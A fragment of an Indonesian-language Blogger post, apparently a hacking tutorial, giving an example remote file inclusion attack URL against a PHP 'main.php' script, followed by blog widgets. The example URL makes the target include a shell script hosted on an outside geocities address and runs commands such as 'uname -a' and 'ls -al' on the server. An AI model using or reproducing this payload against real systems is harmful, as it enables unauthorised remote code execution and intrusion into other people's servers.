    nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

    Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

    0 komentar:

    Poskan Komentar

    blogoptionscomments

    You can replace this text by going to "Layout" and then "Page Elements" section. Edit " About "

    radio ku

    Diberdayakan oleh Blogger.
    Loading...

    Entri Populer

    Ada kesalahan di dalam gadget ini

    Mengenai Saya

    baek hati, setiaa poko e* sipp
    Ada kesalahan di dalam gadget ini

    Followers

    Ada kesalahan di dalam gadget ini

    Cari Blog Ini

    Memuat...

    Amazon MP3 Clips

    radio online